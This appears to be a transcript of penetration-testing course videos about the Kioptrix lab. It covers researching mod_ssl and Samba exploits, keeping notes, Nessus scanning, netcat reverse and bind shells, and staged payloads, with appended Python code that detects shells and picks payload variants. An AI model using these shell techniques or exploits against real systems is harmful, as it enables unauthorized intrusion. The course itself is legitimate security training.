So from here we're just going to go out and open up Firefox, and we'll go out to Google, and on Google we can pick and choose which one we want to research here. Now, this mod_ssl 2.8.4 is probably the juiciest of the items, and we might want to start there. So let's just say something like mod_ssl 2.8.4; you see the 2.8.7 exploit showing up, by the way. We'll just do 2.8.4 exploit and we'll see what comes up. Now, naughty words, naughty words, we'll just call it OpenLuck, okay? And you can see, don't cheat, Kioptrix is coming up as well. But we're gonna go ahead and just open this Apache mod_ssl one, and then we're gonna also open this GitHub one, and I'll cheat a little bit and tell you why here in a minute. So Apache mod_ssl, less than 2.8.7. Scroll through here and it just has the code for us. Now, this is where you have a chance to come through and read the code. Now, it looks to me that they're just identifying, if you've never seen a buffer overflow, which you probably haven't, there will be one later in the course, it's identifying where it's going to have the architecture, right? So the architecture has its own identifier. So depending on which, it looks like this works for quite a bit of different architectures of Linux; depending which Linux you're running is this return address here. So that's all this is doing, and then there's going to be code
down here i'm guessing for an overflow which you see a bunch of a's as you're going to see later in the course this just overflows so you'll learn to read this over time again like you do not have to code this you do not have to be uh you know you don't have to be super good developer but just understanding kind of what's going on and making sure that you know the code that you download is safe on your computer and it's good to go now this is coming off exploit database so you can um i wouldn't say assume but you can trust it for the most part that this is safe code you have the option here to download the exploit and you actually have the option to download the vulnerable app as well if you ever want to build out a machine and play on your own um so we have a little bit information here that it just says hey you know this is less than 2.8.7 open ssl and we've got a remote buffer flow there's nothing else here but that's okay that's you know this might be good for us this is something that we need to note so we can copy this and i would put it here and we could just say something like 80 443 potentially vulnerable to we'll call it open luck and then we'll just put it here and we'll also we should also um save this open look and i'll cheat a little bit and tell you guys why is because this open uh the the exploit database one without uh saying bad words is not going to allow us to work it's not going to work um the the exploit's a little dated and that's why there is a github one out there that actually does work so we're going to utilize the github one instead when we do get to the exploitation section so a little bit of a hint a little bit of a foreshadowing we are going to utilize this exploit so we could also go in and research we could say apache httpd 1.3.20 copy that and come to google and just say hey i wonder if there's an exploit for that and you would just search something like this and you can see in here apache 1.3.20 is actually showing up in this 
vulnerability as well so that's good and then sometimes we see these websites like this cve details these are okay to look at uh they're they're all right like you come in here and what you want to look for is the score immediately my eyes shift to the score i don't care about anything else if i see something that's red i get excited um but we see no red here so i don't think that necessarily this is vulnerable to like a remote code execution it's got a lot of denial of service but i would want to see like a high score which means a critical that's what red is red is critical so we've got high moderate and low here but we don't have a critical one so this doesn't look like it really probably has anything but it is tied to this which is another wheel spinning indicator here that hey you know what we probably got an exploit here with this thing or at least something that we should try and that open ssl is tied directly to this mod ssl so we don't really have to research it now let's move on to samba here samba 2.2.1 a let's copy this and let's check for an exploit so just as simple as is doing this and saying exploit and we've got a few here we've got this samba 2.2.8 remote code execution we've got samba 2.2.x remote buffer overflow and we've got one down here which i love to see this is rapid7 so let's go to rapid7 first why do i like to see rapid 7 well rapid 7 makes metasploit so it looks like this exploit is called samba trans 2 open and let's read a little bit about the description so it says this exploits the buffer overflow found in sam versions 2.2.0 to 2.2.8 that meets our criteria this particular module is capable of explaining the flaw on x86 linux systems that's important to know that do not have the no exec stack option set note some older versions of red hat do not seem to be vulnerable since they apparently do not allow anonymous access to ipc so remember we did get anonymous access to ipc earlier when we connected to it via vr our smb client we never 
got access to admin we could never do anything in ipc we tried to say ls and it said denied but we still logged in so we do have anonymous access to ipc that's interesting and we are potentially running against an x86 linux system so that's interesting as well it looks like we're potentially meeting some of the requirements here now here is where this is great you scroll down here and you see module options and look this is metasploit it gives you the module options it says hey use exploit linux trans to open and then it tells you hey how to do this and then you're good to go that's really nice i really like that so i'm going to copy this one and we'll just come to our notes and we'll say something like 139 potentially vulnerable to trans to open and we'll just paste a link here and we can come read these as well so this is the trans to open overflow here this looks like the manual version of trans to open overflow it looks like it is a pearl script and again it looks like an overflow um so you'll learn to read these and see what they look like just over time but you know you just want to look at the code make sure everything's good to go you will need to run this with pearl it gives you the options here trans to root perl what option to select what target type to select your ip address and your target iep address so we'll save this one as well why not and we'll take a look at the other one just see what it is and it looks like it could work for us remote root exploit for samba 2.2.x that works against all linux distributions samba.c i think this is a possibility as well so this is c code here we're going to go ahead and just copy this and we'll go ahead and add this to our list as well and we'll figure it out so all we're doing right now is the research okay so from here i've showed you the google way let's say for some reason you want to do this on the fly you want to use another tool or you're you know you're in a network and the network has no access you have 
no internet access out, you have no research capabilities. You can go to the terminal, and there's a great way to research this as well. So let's go back up to our notes and take a peek. Now let's take this Unix Samba 2.2.1a, for example, and let's do a tool called searchsploit. Now searchsploit is going to search the Exploit Database, this whole database here that we're looking through. It's brought down onto your machine every time you update your machine, and the database updates, it updates down to your machine, and all those exploits get downloaded for you already. But you could say "searchsploit", and maybe we search something like "samba 2.2.1a". Let's see what happens: no results. Well, okay, why is that? Well, let's delete this. Now, you cannot be too specific with searchsploit. The more specific you are, the worse off you are, because searchsploit is searching the exact string that you are using. Now you see that we search "samba", and it's searching for samba 2.2. Okay, now we can start to see some things here. We see a Linux remote code execution right here, and we're going to have to look through these. Now, it's not pretty, right? It's not the prettiest, but you see the trans2open does show up. Now it's not the easiest way, I do prefer Google, but if you're in a pinch, or you want to look at all the different possibilities and see, maybe, hey, is there a 2.2 in here? So, like, look: Samba 2.2.0 to 2.2.8, OS X. That's not our operating system, but it's called trans2open, and we see that over and over and over again. So maybe the wheels spin again and it says, hey, trans2open, I think that's potentially what we're looking for here. And then once we get down to the threes we know, hey, we've gone too far, this is not our version, etc. We could do the same thing with, let's say, the mod_ssl, and we can say something like "mod_ssl 2" if I type "searchsploit" in front of it and do some searching there. And we can see, okay, there's denial of service, not it; 2.8.x, potentially, right; and then mod_ssl 2.8.7. And another
thing to look at over here: denial of service, denial of service, remote, remote. Remote is huge. Remote means remote code execution. So learning to read these as well: exploit, check; Unix, okay, we're running on Linux, check; remote code execution, check; and Apache mod_ssl less than 2.8.7, check. So there's three different versions of this, and this is kind of why, when I said earlier that, you know, they don't really work, one's been broken, they've rebuilt it. I just like the one off GitHub, so we'll play around with that one in just a little bit. But this is what you're doing: you're either going out to Google with the information that you find, or you're going to searchsploit. You're just doing research. So now we've identified a couple potential vulnerabilities and we can go from there. So what I encourage you to do is just do some research on this Webalizer, do some research on OpenSSH, see what you can find out, just for research's sake. Practice with searchsploit, practice with Google, and then meet me in the next video.

So what I want to do before we get into exploitation, I want to give you a quick sneak peek at what your notes should look like so far, so you can see what good note keeping is, and this is in terms of an assessment, okay, just in terms of an assessment. And then from there we're going to practice with some other scanning tools, just to get you familiar with other things than using just Nmap, and then finally we'll move into our exploitation. So I will see you in the next video when we look quickly at our notes.

Now looking at our assessment notes so far. So you can make this however you want to make it; whatever makes sense for you is how you should do this. Now this is just a basic example of how I might take notes on an assessment. Now this is just one machine. You might be scanning against hundreds of machines sometimes, and that's okay, you just make the notes against the machines and what findings you have. So for example, here I've got this machine and it's all under this one tab, and we've got some
Nmap results, and then on the Nmap results we've got the different ports that I found open. I did leave off the RPC ones, but we can see our Nmap full results here. We can see, okay, on 22 I found OpenSSH; on 80, here's some interesting items I may have had, you know, again this is just from our notes, looks familiar, and then I put in the Nikto scan under here; and on 139 I've got the Samba here, and this is just notes for us again: could anonymously connect to IPC$ with smbclient but not ADMIN$. Your client is never going to see these, so make sure you make good notes for yourself, how you can understand it, and importantly, make sure that if somebody goes through here they can also understand it, because sometimes somebody else might need to go through your report or through your notes, or somebody might be helping you write your report, and it's important to be clear and concise with what you're doing. Now I've got an exploitation tab here. We have not exploited anything yet, but I do have a findings tab here as well. So we've got a couple findings already. We've got this wonderful default test page, and it's hard to see because I've got it on my screen that's blown up, but you saw it once. And make sure that you have the IP address or the hostname in your pictures; that's important. And then information disclosure here with the 404 page, and we've got the server header information disclosure. Now these are both taken in Greenshot, and a couple things to point out just for details: I've got borders added around these, and I've highlighted where exactly the finding is, okay? So it's best to point out, because if these screenshots are going in a report, it's best to find out and just point out to the client exactly where it is, where they need to be looking. And again, make sure you have your identifier here if you can have it. And then here is a response from the website, and again with the information disclosure. So that's just a quick example of how your notes should start to form and how they should look, and
then we'll do another one after the initial exploitation to kind of show how we exploited this machine and how we might take some notes for the client as well. And then you'll get to see this all over again in the sample report when we cover report writing towards the end of the course. So that's it, just a quick lesson just to make sure you're still keeping up with your notes. I'm going to harp on this throughout because it's very, very important. So I will catch you in the next video's next little mini chapter on some additional scanning tools, and we'll get right into exploitation.

Now it's time to play around with Nessus. So when it comes to Nessus, Nessus is what is called a vulnerability scanner. You're going to use this quite frequently when you work as a penetration tester, ethical hacker. Basically, let's say you're doing an external assessment. Chances are that you're going to use Nessus in that assessment, probably even right away. You might kick off your scans; basically you're gonna send out an email saying, hey, scans are about to start, and then you're gonna start your scans, and then you're gonna let those scans run. And while you let those scans run, they take some time, you're gonna go out and do your information gathering, maybe look for those breached credentials, try to find something juicy on the client. Then you'll come back and you'll review your scan results and see if there's anything interesting there. Same thing with internal, and the process really doesn't change. We use Nessus quite a bit, so we're going to use Nessus here and just see what it looks like and how we can use it to our advantage. So let's go ahead and just go out to Google, and we're going to google "nessus download", and we're going to go to Downloads right here from Tenable. Actually, we'll download Nessus right here, sorry. And up at the top we are looking for 64-bit Debian. So it says Ubuntu, but we're just looking for the Debian. So we're going to go ahead and just click on that and download it. We'll agree, we
won't even read it, and we'll save here. And this will take a minute or so to download depending on your connection speed, so if you need to pause, go ahead and pause. Now we're going to open up a terminal, and I'll make this a little bit bigger, and I'm going to cd over to my Downloads folder because that's where it is. And then we're going to say dpkg, which is D package, and we're going to install with the -i. Then we're just going to say Nessus, there we go, just tab. If you have nothing in there, capital N on the Nessus and it should autocomplete. And then we'll hit enter, and it's going to grab the package and then start to download it here and install it. You can see automatically it has been installed. So it says you can start Nessus scanner by typing /etc/init.d/nessusd start. We're just going to copy that and paste it, and then we're going to navigate to this kali:8834, I cannot talk. And then you're going to see "your connection's not secure"; we're just going to say Advanced, Add Exception, Confirm, and here is Nessus. Now this is going to compile plugins here, so this is going to take some time. Go ahead and let this finish, and when it does, go ahead and say we're going to download or install Nessus Essentials, okay? And then you're going to provide it with your name, and you need a valid email for an activation code. All right, once your activation code has arrived via email, go ahead and just copy, paste, and then hit Continue. And then it's going to ask you for a username, so I'm just going to say hadams for me, and then I'll just do password123 because, you know, I'm super secure. I'm not going to save, and then now it's going to take a minute, so just go ahead and pause your video, let this install, go get a drink, go get some coffee, whatever it is that makes you happy. And once your Nessus is installed and you are at a login screen, go ahead and log in and then come back to the video and we'll start from there. That took forever. All right, so we have loaded Nessus, it's installed
and now we're brought to this blank screen that says My Scans. Why is it blank? Well, it's blank because we haven't made a scan yet. So let's go ahead and go up to New Scan, and let's quickly talk about what we're capable of doing. So this is the free edition of Nessus. This means that we can scan against any private IP address, and we can scan up to 16 of those, I do believe, at one time. So remember back to the networking section of your class: class A through class C, that's what we're capable of scanning here. If you were to try to go out and scan a website or an external host, not gonna happen. So we do have a couple options here. We're gonna start with this Basic Network Scan, and then we'll talk a little bit about the Advanced Scan. So let's go ahead and click on this Basic Network here, and what we can do is we can just type in something like "Kioptrix" for the name, and I just always copy this because you need a description; I just like to paste it in the description as well. And then down here it's going to say, hey, what targets do you want to scan against? Well, we're only going to provide one IP address, and that is the IP of Kioptrix. And then let's go with the tabs here on the side. We've got the Schedule tab. Schedule sounds exactly what it sounds like: it's scheduling. So let's say that you are into automation and you're working as a pen tester, and it's a Monday morning at eight. Maybe you wanna sleep in just a little bit longer, and you say, hey, you know what, I got to email a client. I'll schedule that email to go at 8 o'clock, and then the email is going to say, hey, we're kicking off scans right now, and at 8:01 maybe your scan can kick off, and you can schedule that to happen, and then you can wake up a little late. Pro tips there. Also you can enable scanning for once, daily, weekly, monthly, yearly, so if you're in a business you can do this on a periodic basis and get updated scan results. There's also notifications via SMTP if you have an SMTP server. Most importantly, Discovery. So it's going
to do a port scan of common ports here. I actually like to do a port scan of all ports. Again, this is the same thing as, like, a -p versus a -p-. You see the 1 through 65535 here; we come down, just common ports, I'm guessing top 1,000. So let's go down into Assessment, and we see scan type Default. So we can scan Default, we can scan for web vulnerabilities, we can scan for all web and all web complex. Let's just scan for known web vulnerabilities. If we go into complex, it's going to take a while, and this just depends on how deep into the scan you want to go. But we're just going to say for now scan for known web vulnerabilities, and it'll show what it's going to do: it's going to do some page crawling, do some directory traversing, and look for vulnerabilities, okay? On the Report, it's going to say, hey, can we edit scan results? Yes, we can. Should we display hosts that respond to ping, display unreachable hosts? I just leave this as default most of the time. And then on the Advanced tab we have scan type; I just like to say Default here. So we'll save this, and then we'll go ahead and just launch it, and you'll see the wheel start spinning, and now it means we're running. And this is going to take some time, so while this is going on, let's go ahead and hit New Scan up here and let's look at this as well. So we've got the Advanced Scan, and they've got other scans here which I don't use a lot of, but you might have used them in the past if you're familiar with Nessus. Or they've got little one-offs, like they've got this Shellshock detection, and it looks like they've got the Shadow Brokers detection here. So they've got a couple different scans, even a malware scan. But we're going to go into Advanced Scan; these are the most common two you'll be using. Same deal here, and when we go into Discovery, you see the Discovery is a little bit different. So we've got host scanning, and it says, hey, do you want to ping the host, or maybe you don't want to ping the host? And if
we do ping the host, what are we looking for? Are we looking for ARP, TCP, ICMP or UDP? What do we want to scan? Do we want to scan network printers? If we're doing an internal network assessment, maybe we want to click that, maybe not, you know. And we can do different types of scanning here. There's a lot more options, which is what advanced scanning is for. We could do port scanning; you see the SYN scan comes up again, aka stealth scanning. We could do UDP, and even down here it says it's really not possible for UDP to pick up between open and filtered ports, so UDP scanning takes forever and it's not always reliable. We can do service discovery. I kind of just leave these blank or leave them as default. And then we come through Assessment, same thing, it just gives us additional options here, so it's always good to click through these. Do we want to brute force any logins? We could use Hydra to do brute forcing if we want. We could test for default accounts on, if we could discover, like, an Oracle database, etc. But this is going to go through and try empty passwords, try login as password, etc. So this just does a little bit more here. We can scan web applications, and we can say, hey, we want to use a specific user agent, or we want to crawl from a certain web page, how many pages are we going to crawl. Again, it just gives us more control. So if we come down here, Reporting looks the same, and then Advanced, we have a little bit more options here as well. But again, either way, if you use Advanced Scan, I would start with the basic scan just as a beginner and then kind of play around with the Advanced Scan and see if you can scan against the same host and maybe get back more information. And maybe Kioptrix is a good one to play with. But let's go ahead and go over to Credentials. And now, if you had credentials for a machine and you wanted to, like, log into that machine via SSH or Windows or even SNMP, you can enter in credentials and you could scan a little bit deeper on the machine, but you're likely
never going to get that as a pen tester, because you usually don't have any access. So let's go back to our scans, and you see now that it's scanning and running. The nice thing is that it does update vulnerabilities as it finds them, and it is finding them. We're actually at 99 right now, so you can click in it and you can see that it's got all different kinds of vulnerabilities, and right now they're kind of grouped, so we won't worry about them too much. We're going to ungroup this once it's done. So I tell you what, go ahead and let your scan finish. Once your scan's finished, I'm going to meet you over in the next video, which is going to be part two. We're going to look at the scan results, talk about them a little bit, and see what Nessus can do for us.

Now on to part two. Our scan results are done, and we can tell because we've got a nice check mark here that says complete. So we're just going to click into our scan results, and looking at the overview we can see here that we've got 5 critical, 38 highs, 59 mediums, 10 lows and 67 informational. So we're going to click on the Vulnerabilities here, and let me make this bigger. So what we're going to do is we're going to take a peek at this, and this new version of Nessus actually starts grouping these together. Let's go ahead and hit Settings and Disable Groups, and that'll show us by severity. So look what's coming back up: OpenSSL unsupported. Let's check it out: 0.9.6b, 1.1.0, and it's saying according to the banner the remote server is running OpenSSL, and it doesn't tell us much about it. We'd actually have to do a little bit of research, click into this, see why this is such a bad thing, but this is absolutely out of date, okay? So if we're making a screenshot here, we're gonna say, hey, this is out of date, we see this installed version, it's recommended to patch to this version. So if you're taking notes, you can go ahead and add that into your notes for your vulnerabilities; this is insufficient patching. Come back through here, it says even OpenSSH has
remote privilege escalation, it's got remote overflows, so it looks like you could possibly perform an overflow against SSH. So if you did some research and you were able to find a vulnerability with that, that's cool. And we come through here and you see the Apache has denial of service, cross-site scripting. Again, Apache looks like insufficient patching, and mod_ssl shows up, OpenSSL shows up, and I mean we've just got vulnerability after vulnerability. So we would write a lot of these up, and depending on the assessment and how the assessment was going depends on the severity that we're going to write up. Now, if we find remote code execution, we get a lot of access to a client, and a client just lights up like a Christmas tree when it comes time to reviewing their scans, then a lot of these, you know, we might report on a lot of these, and we might not report on a lot of lows or a lot of the mediums. But if we're in the opposite situation, where, you know, we aren't finding a lot but there's still stuff to report, then we might report on, like, hey, OpenSSL is, you know, it's out of date. And then we go to the next page and we find a low, and maybe there's, like, okay, there's something in here that's related to SSL/TLS, this one is an unsupported cipher, we might report that as well, just depending on the potential and how many vulnerabilities there actually are. So as of right now, it looks like this box is pretty critical. But what we also do as penetration testers is we take all the results in front of us, and what we'll do is we'll come in and we'll download this .nessus file. We'll take that .nessus file, and there's tools out there to convert a .nessus file into an Excel document, and it makes it nice and pretty, and we'll hand that over to the client as well. And in the report it'll say, hey, look, we've covered some of the vulnerabilities; there's no way for us to touch all of them because this is a timed assessment. We focused on the low-hanging fruit, we focused on what we could, so
please do go look at your Nessus scan results and all the information that we provide to you, because it's super important. So again, if we have a client like this where we're going to have remote code execution, we're going to have a lot of vulnerabilities, then these things just start to stack up. And this is what a Nessus result looks like. You can click into these, you can get more information, and possibly even, you know, details on how to exploit it and how to solve it as well. So there's useful links in here a lot of the times, and, you know, they give you information. But you should always go out and verify. Never trust your vulnerability scanner just because it says, hey, we detected it. You should go out and look and find it, just like we had that screenshot from before with the Apache service version. We know this exists. We wouldn't provide a screenshot of the output of Nessus; we would go provide a screenshot that says, hey, we actually proved that we know it's there and you're out of date. So hopefully that gives you an idea of what we're doing with Nessus and why we're using it and how it could be an advantage to us. Sometimes we're so overwhelmed with everything around us that we might miss some vulnerabilities, and it's nice to just have a scanner detect a lot of vulnerabilities for us, and it gives us something to look through, something to verify, double check, etc. It's just an extra layer of vulnerability assessment for us; it's a friend in the game. So I own two programs as a pen tester, two programs that I pay for: a Nessus license is one, Burp Suite Pro is the other. So that's it for this section.

Now we're gonna move on to exploitation, really start to get into the fun stuff, talk about some different exploitation techniques you're gonna see, and then we'll do a bunch of box walkthroughs and get into exploit development, and it's about to get so fun. This is the fun part of the course. Up until this point it's just been scanning, enumeration, learning about the process, and
it's been nine hours of course materials so far, almost eight hours of course material, just to get to this point. That's how important I think that information gathering and scanning and enumeration are, along with the foundations and the materials. You need to know all that before you can just start exploiting machines. So now we're there. Congratulations, pat yourself on the back. We're almost halfway through the exploitation part of this course, so once we get to the middle of the course capstone, I think it's gonna be really fun and exciting. So that's it, end of spiel. I'll see you over in the next section when we start learning exploitation.

Before we can start the cool exploitation phase, we have to first define a couple things. So we're going to quickly define different shell types we're going to see, and then we're going to define different types of payloads we're going to see. So let's first start with the shells. The most common shell you're going to see is what is called a reverse shell. Now in this example it is using a tool called netcat, which you're going to see here shortly. And a shell, all a shell is, is access to a machine. So when we say we pop a shell, that means we get access to a machine. Now a reverse shell, a reverse shell means that a victim connects to us. Here you see it says target connecting to attack box, and you may get asked this question about shells in an interview: what is a reverse shell, what is a bind shell? So a reverse shell means, again, a victim connects to us. You see that it says target is connecting, attack box is listening. So what's happening here is that on the attack box you can see that we have netcat, this is nc, and we're just listening on a port here. -lvp means listening, verbose, port. So we're listening on port 4444; that means on our machine we're opening up that port. When we use netcat on this machine, it's going to say, hey, netcat, I want to connect to this IP address here, I want to connect to it on port 4444.
and when i do that i'm going to establish this bin shell here so i'm going to execute bin shell which is a linux machine if this was windows it would be command.exe so what we're going to do is we're going to say hey let's connect over here and this is going to connect so all we're going to do with reverse shell is we're going to listen now with the bind shell a little bit different we have our attack box and then our target so with the bind shell we actually open up a port on the machine then we connect to it so we fire off an exploit the x-play goes in and it opens up a port and then it's listening for us to connect when we connect on that specific port to that specific machine with netcat then we're going to go ahead and get that shell and on this side it's going to execute for us that bin sh now if we go back same thing here we're going to send some sort of exploit that's going to talk back and say hey i want to when you exploit this go ahead and just connect to 4444 on this machine now this is going to come together very clearly when we get into our exploit development part here in just a little bit but all you need to know right now is that a reverse shell means the target connects back to us a bind shell means we connect to the target now a little bit more about reverse shells you're going to use reverse shells 95 of the time there are instances where you're going to use bind shells bind shells most likely are going to be on an external assessment if you think about it a reverse shell you're sitting in your home network and you are sitting on a vm and that vm is using an internal ip address that's talking out through nat it's going through your public ip address and you're attacking a target well how are you going to connect that public ip address of the target back to yourself on an internal ip you're going to have to set a port forward or port trigger on your firewall to talk into that specific machine it's a little bit of extra work you're opening some 
stuff up on your side the other idea is to say hey buying shell why don't i just go ahead and open a port up on that target i'll nap my way through my public ip address and i'll just connect to that port it doesn't care what ip address you're coming from you see it's just listening so we can come from any ip address and connect that port on that machine so this is where bind shells are useful when we have to bypass some sort of firewall or just make sense sometimes a reverse shell just doesn't work and we have to use a bind shell anyway so we have to think about the connection and how it's getting to and from us most of the time especially because you're going to practice a lot in labs and you're going to do internal assessments as well most of your shelves are going to come in the form of reverse shell however bind shells do exist and you should know what they are as well and again for an interview you should know the difference so before we finish here let's go ahead and take a look at what these look like and i'm going to log back into my machine and i've got two things open here i've got one and two we're gonna play victim and we're going to play uh target right or attacker so on the attacker if we have a reverse shell we're just going to say netcat i want to listen and i like to do nvlp but you can do lvp as well vlp it doesn't matter what order i just do the mvlp and all fours so now we're listening on any on all fours right so here we're going to say on the victim screen we're going to say hey netcat i want to connect and this is a self connection but still i want to connect to the victim machine or i want to connect to my attacker from the victim machine and our attacker's ip address is 139 they've got four four four four open let's establish that connection and we're going to offer them bin bash when we do and here's that connection so this is a reverse shell we were listening as the attacker and then the victim connected to us and then we could say 
something like whoami, and you can see root, and then hostname, kali, and we have a connection and we offered up that /bin/bash here. So that works, and that is an example of a reverse shell. So I'm going to Ctrl+C this connection, kill it, and it dies over here. Now let's say we wanted to flip the script and do a bind shell. Well, now guess who needs to be listening? In this instance we, the victim, are going to be listening and we're going to be offering up the /bin/bash, because we are the victim, okay, so we still have to offer up whatever command line we're going to have here. Now all we have to do as the attacker is connect to our victim, and we have the same connection. You see the connection happens here: whoami, root, hostname, kali. So that is the difference between a bind shell and a reverse shell. Remember, reverse shells are most commonly used, but bind shells are important. Again, just to hammer it home: a reverse shell means the victim connects to us; a bind shell means we connect to the victim. So I'll catch you over in the next video when we talk about staged versus non-staged payloads. Now let's talk about staged versus non-staged payloads, and before we do that we must talk about what a payload is. A payload is the code we deliver with an exploit: when the exploit succeeds, what runs on the target is the payload. We use different types of payloads depending on what it is, so you might see a Windows type payload or a Linux type payload, or, as you see on the screen, a Meterpreter type payload; there's Python, there's all different types, there's like 500-something that we saw in Metasploit alone. These payloads are what we send to a victim in an attempt to get a shell on the machine. Now it's going to make more sense as we go; it's okay if you're still a little bit confused on all this. There are two main types of payloads that we need to pay attention to: there is what we call non-staged and what we call staged. Now a non-staged payload sends the exploit shellcode all at once, whereas a staged payload sends it in stages.
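Seen from the defender's side, both shells in the demo above share one tell: a shell process (sh or bash) whose standard input and output are a network socket. Here is an added example, written for this page and not part of the course or of netcat, that parses constructed `ss -tnp` output and flags a reverse shell (the shell's socket is an outbound connection on an ephemeral port), a bind-shell session (the shell's socket sits on a locally listening port) and a bare netcat listener. The process-name sets, the ephemeral-port cut-off and the sample rows are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Interpreters that should never own a network socket on a server (assumption: extend for your fleet).
SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}
# Tools commonly used to park a listener for a bind shell (assumption).
LISTENER_TOOLS = {"nc", "ncat", "netcat", "socat"}
EPHEMERAL_MIN = 32768  # default Linux ip_local_port_range lower bound

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')

# Constructed `ss -tnp` rows for a victim at .134 and an attacker at .139 (not real captures).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port      Peer Address:Port    Process
ESTAB  0      0      192.168.57.134:22      192.168.57.139:51234 users:(("sshd",pid=900,fd=4))
ESTAB  0      0      192.168.57.134:39822   192.168.57.139:4444  users:(("bash",pid=1337,fd=0),("bash",pid=1337,fd=1),("bash",pid=1337,fd=2))
LISTEN 0      1      0.0.0.0:4444           0.0.0.0:*            users:(("nc",pid=2222,fd=3))
ESTAB  0      0      192.168.57.134:4444    192.168.57.139:52000 users:(("bash",pid=2223,fd=0),("bash",pid=2223,fd=1),("bash",pid=2223,fd=2))
ESTAB  0      0      127.0.0.1:5432         127.0.0.1:41000      users:(("postgres",pid=700,fd=9))
"""


@dataclass
class Finding:
    kind: str      # "reverse-shell", "bind-shell-session" or "suspicious-listener"
    state: str
    local: str
    peer: str
    process: str
    pid: int
    fds: list = field(default_factory=list)


def parse_ss(output):
    """Yield (state, local, peer, [(name, pid, fd), ...]) for each data row of `ss -tnp`."""
    for line in output.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5 or parts[0] in ("State", "Netid"):
            continue  # header or blank line
        procs = PROC_RE.findall(parts[5]) if len(parts) > 5 else []
        yield parts[0], parts[3], parts[4], [(n, int(p), int(f)) for n, p, f in procs]


def port_of(addr):
    return addr.rsplit(":", 1)[-1]


def find_shell_sockets(output):
    rows = list(parse_ss(output))
    listen_ports = {port_of(local) for state, local, _, _ in rows if state == "LISTEN"}
    findings = []
    for state, local, peer, procs in rows:
        by_proc = {}
        for name, pid, fd in procs:
            by_proc.setdefault((name, pid), []).append(fd)
        for (name, pid), fds in by_proc.items():
            # A shell whose stdin/stdout/stderr (fd 0/1/2) is a TCP socket is the
            # signature of `nc -e /bin/bash` in either direction.
            if name in SHELLS and state == "ESTAB" and {0, 1, 2} & set(fds):
                lport = port_of(local)
                bound = lport in listen_ports or (lport.isdigit() and int(lport) < EPHEMERAL_MIN)
                kind = "bind-shell-session" if bound else "reverse-shell"
                findings.append(Finding(kind, state, local, peer, name, pid, sorted(fds)))
            elif name in LISTENER_TOOLS and state == "LISTEN":
                findings.append(Finding("suspicious-listener", state, local, peer, name, pid, sorted(fds)))
    return findings


if __name__ == "__main__":
    for f in find_shell_sockets(SAMPLE_SS):
        print(f"{f.kind:20} {f.process}[{f.pid}] {f.local} <-> {f.peer} fds={f.fds}")
```

Run against the real thing with `ss -tnp | python3 this_script.py`-style plumbing (feed stdout into `find_shell_sockets`), and remember the bind-shell heuristic: once a plain `nc -l` has accepted its connection the LISTEN row disappears, which is why the example also treats a shell sitting on a non-ephemeral local port as a bound session.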
The non-staged payload is larger in size and it doesn't always work, whereas the staged payload can actually be less stable, so each has its con. And we have an example of it, and this is really what I want to point out: we have this non-staged payload and we have a staged payload, and do you see the one difference between the two? All it is is a forward slash. So when we see these and we're using something like Metasploit and we have to pick out a payload, if we see something like meterpreter_reverse_tcp, that underscore identifies it as a non-staged payload (we can ignore the windows part here), but here we see meterpreter/reverse_tcp, and that forward slash means we have a staged payload. What's happening? The slash is saying, hey, stage one, stage two; the underscore is saying, hey, let's send this all at once. So this is going to become very important very quickly, as we will attempt an exploit here very soon and it's not going to work, and then we're going to change the payload and it's going to work beautifully. So understand that the real takeaway is: if you have a payload that does not work, maybe try the other type of that payload. If you see something like reverse_tcp, which is a reverse shell over a TCP connection by the way, and you say, hey, I'm going to send this staged reverse_tcp and it's not working, all right, let me try to send a non-staged reverse_tcp. Okay, that's not working, but I'm sure my exploit's right, so maybe I send a bind shell instead of a reverse shell here, and I'll send a staged bind and then a non-staged one, and we just keep trying until we find a payload that works. Not every payload is the right payload and we have to find the one that works for us. So the takeaways: remember the forward slash, remember the slight differences between non-staged and staged, and remember, if your payload fails but you think it's the right exploit, maybe change your payload. We'll see that here very shortly as we start to get into exploitation in the next few videos.
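The slash-versus-underscore rule above can be written down. This is an added example in Python, not Metasploit's own code, that classifies a payload name as staged or non-staged from its last path component, produces the alternate form, and lists the try-order the lesson describes (staged reverse, non-staged reverse, then the bind versions). The STAGE_NAMES tuple is an assumption covering common Metasploit stage names; whether a given variant actually exists still has to be confirmed against `show payloads` in msfconsole.

```python
# Stage components Metasploit uses in staged payload paths (assumption: a common subset, not the full list).
STAGE_NAMES = ("patchupmeterpreter", "patchupdllinject", "meterpreter", "dllinject",
               "vncinject", "upexec", "shell")
CONNECTIONS = ("reverse_", "bind_")


def payload_kind(name):
    """'staged' for stage/stager (meterpreter/reverse_tcp), 'non-staged' for stage_stager
    (meterpreter_reverse_tcp), 'single' when no stage component is named (cmd/unix/reverse_bash)."""
    parts = name.split("/")
    last = parts[-1]
    if last.startswith(CONNECTIONS):
        return "staged" if len(parts) > 1 and parts[-2] in STAGE_NAMES else "single"
    for stage in STAGE_NAMES:
        if last.startswith(stage + "_") and last[len(stage) + 1:].startswith(CONNECTIONS):
            return "non-staged"
    return "single"


def alternate(name):
    """Swap the slash for an underscore or back; None when the name has no staged/non-staged twin."""
    parts = name.split("/")
    kind = payload_kind(name)
    if kind == "staged":
        return "/".join(parts[:-2] + [parts[-2] + "_" + parts[-1]])
    if kind == "non-staged":
        last = parts[-1]
        for stage in STAGE_NAMES:
            if last.startswith(stage + "_"):
                return "/".join(parts[:-1] + [stage, last[len(stage) + 1:]])
    return None


def flip_direction(name):
    """reverse_* <-> bind_* in the last component; None if neither appears."""
    head, _, last = name.rpartition("/")
    if "reverse_" in last:
        last = last.replace("reverse_", "bind_", 1)
    elif "bind_" in last:
        last = last.replace("bind_", "reverse_", 1)
    else:
        return None
    return f"{head}/{last}" if head else last


def candidates(name):
    """The try-order from the lesson: current, other staging, then both forms of the other direction.
    Existence of each variant still has to be confirmed with `show payloads`."""
    flipped = flip_direction(name)
    order = [name, alternate(name), flipped, alternate(flipped) if flipped else None]
    out = []
    for c in order:
        if c and c not in out:
            out.append(c)
    return out


if __name__ == "__main__":
    for p in ("linux/x86/meterpreter/reverse_tcp", "linux/x86/shell_reverse_tcp", "cmd/unix/reverse_bash"):
        print(f"{p:40} {payload_kind(p):11} -> {candidates(p)}")
```

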